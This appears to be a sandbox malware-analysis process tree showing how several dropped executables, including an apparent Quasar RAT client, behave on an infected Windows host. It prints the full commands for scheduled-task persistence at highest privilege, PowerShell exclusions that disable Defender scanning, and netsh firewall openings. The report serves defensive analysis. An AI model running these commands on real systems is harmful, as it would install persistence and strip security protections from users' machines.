C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:3484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5HYSZnqqrUwh.bat" "7⤵PID:4188
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:1072
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3684
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"8⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:5512 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:5444
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VTc9eTEROb4i.bat" "9⤵PID:5708
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:5820
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3728
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"10⤵PID:5652
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:5620
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FX5RiTCtN0ks.bat" "11⤵PID:5808
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:5352
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3776
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"12⤵PID:5520
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:4188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5ImYpK9rwbfi.bat" "13⤵PID:2308
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:464
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2924
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"14⤵PID:5052
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:6048
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\J15xKitpPbqd.bat" "15⤵PID:4720
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:5808
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3080
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"16⤵PID:6048
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:4020
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9wzkq6jtFNQ0.bat" "17⤵PID:5828
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:1964
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:956
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"18⤵PID:5252
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:5760
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\I1cby2j4igRX.bat" "19⤵PID:4868
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:5436
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5444
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"20⤵PID:1280
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:2816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\U4iJ6j2lQloH.bat" "21⤵PID:5344
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV122⤵PID:5820
-
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:6068
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2256
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"22⤵PID:4120
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:4408
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1kj4pTejnGH6.bat" "23⤵PID:3356
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:4752
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2396
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"24⤵PID:4344
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
PID:1932
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ll6idhQmDBeo.bat" "25⤵PID:4560
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:4756
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6548
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"26⤵PID:5584
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f27⤵
- Scheduled Task/Job: Scheduled Task
PID:1456
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2ewxncSsaNuO.bat" "27⤵PID:6576
-
C:\Windows\system32\chcp.comchcp 6500128⤵PID:6868
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6652
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Network.exe"C:\Users\Admin\AppData\Local\Temp\a\Network.exe"5⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Network.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Network.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Network.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5728
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Network" /tr "C:\Users\Admin\AppData\Roaming\Network.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:6016
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\rea.exe"C:\Users\Admin\AppData\Local\Temp\a\rea.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:2620 -
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"6⤵PID:5088
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe"C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:2404 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "WAN Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmpF1C2.tmp"6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5168
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "WAN Service Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpF2AE.tmp"6⤵
- Scheduled Task/Job: Scheduled Task
PID:5240
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe"C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe"5⤵
- Executes dropped EXE
PID:5172
-
-
C:\Users\Admin\AppData\Local\Temp\a\mod.exe"C:\Users\Admin\AppData\Local\Temp\a\mod.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5284
-
-
C:\Users\Admin\AppData\Local\Temp\a\Server.exe"C:\Users\Admin\AppData\Local\Temp\a\Server.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3668 -
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"6⤵
- Drops startup file
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:5500 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE7⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3296
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"7⤵PID:5812
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"8⤵PID:6068
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE9⤵
- Modifies Windows Firewall
PID:5456
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"9⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"10⤵PID:2396
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE11⤵
- Modifies Windows Firewall
PID:5732
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"11⤵PID:3908
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"12⤵PID:5532
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE13⤵
- Modifies Windows Firewall
PID:5496
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"13⤵PID:5528
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"14⤵PID:2576
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE15⤵
- Modifies Windows Firewall
PID:5072
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"15⤵PID:2680
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"16⤵PID:5208
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE17⤵
- Modifies Windows Firewall
PID:564
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"17⤵PID:5412
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"18⤵PID:2884
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE19⤵
- Modifies Windows Firewall
PID:4756
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"19⤵PID:1108
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"20⤵PID:3296
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE21⤵
- Modifies Windows Firewall
PID:3728
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"21⤵PID:5884
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"22⤵PID:5204
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE23⤵
- Modifies Windows Firewall
PID:4980
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"23⤵PID:4184
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"24⤵PID:3876
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE25⤵
- Modifies Windows Firewall
PID:916
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"25⤵PID:5644
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"26⤵PID:2908
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE27⤵
- Modifies Windows Firewall
PID:5272
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"27⤵PID:32
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"28⤵PID:1884
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE29⤵
- Modifies Windows Firewall
PID:388
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"29⤵PID:3948
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"30⤵PID:5620
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE31⤵
- Modifies Windows Firewall
PID:5808
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"31⤵PID:6396
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"32⤵PID:6632
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE33⤵
- Modifies Windows Firewall
PID:6836
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"33⤵PID:2840
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"34⤵PID:6228
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE35⤵
- Modifies Windows Firewall
PID:7092
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Client.exe"C:\Users\Admin\AppData\Local\Temp\a\Client.exe"5⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5764 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:6096
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:1784 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:4624
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pYjYvn5tI2bC.bat" "7⤵PID:5568
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:5732
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6104
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"8⤵PID:5660
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:5716
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4Y4sBbAK2Iay.bat" "9⤵PID:4708
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:5252
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5536
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"10⤵PID:6096
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:5308
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cTeHmVuArX7j.bat" "11⤵PID:1536
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:5408
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4852
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"12⤵PID:388
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:5756
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\STkbwjQU3nJC.bat" "13⤵PID:3188
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:5488
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3256
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"14⤵PID:5128
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:5744
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\R1hnPVJFkFhR.bat" "15⤵PID:5716
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:5776
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5508
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"16⤵PID:2732
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:5352
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Pr3EIpxvYrSj.bat" "17⤵PID:548
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:3544
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5784
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"18⤵PID:4108
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:5860
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AJ30T8jaWOSg.bat" "19⤵PID:2228
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:5508
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1100
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"20⤵PID:1968
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:240
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rRT0VhWq6BCO.bat" "21⤵PID:4776
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:3948
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2644
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"22⤵PID:1116
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:1452
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sbt3RCPfnVaU.bat" "23⤵PID:5760
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:6248
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6616
-
-
C:\Windows\system32\Windows Shell Interactive.exe"C:\Windows\system32\Windows Shell Interactive.exe"24⤵PID:6156
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
PID:6408
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1ep3FYeec4t1.bat" "25⤵PID:6532
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:5632
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\jij.exe"C:\Users\Admin\AppData\Local\Temp\a\jij.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:6020
-
-
C:\Users\Admin\AppData\Local\Temp\a\333.exe"C:\Users\Admin\AppData\Local\Temp\a\333.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5268
-
-
C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe"C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe"5⤵PID:2808
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:2508
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"6⤵PID:5028
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:4600
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iTPks6k2P1G3.bat" "7⤵PID:5392
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:2064
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4796
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"8⤵PID:1444
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:5340
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PVFykXaqQZRP.bat" "9⤵PID:5848
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:4720
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3000
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"10⤵PID:1644
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:3084
-
-
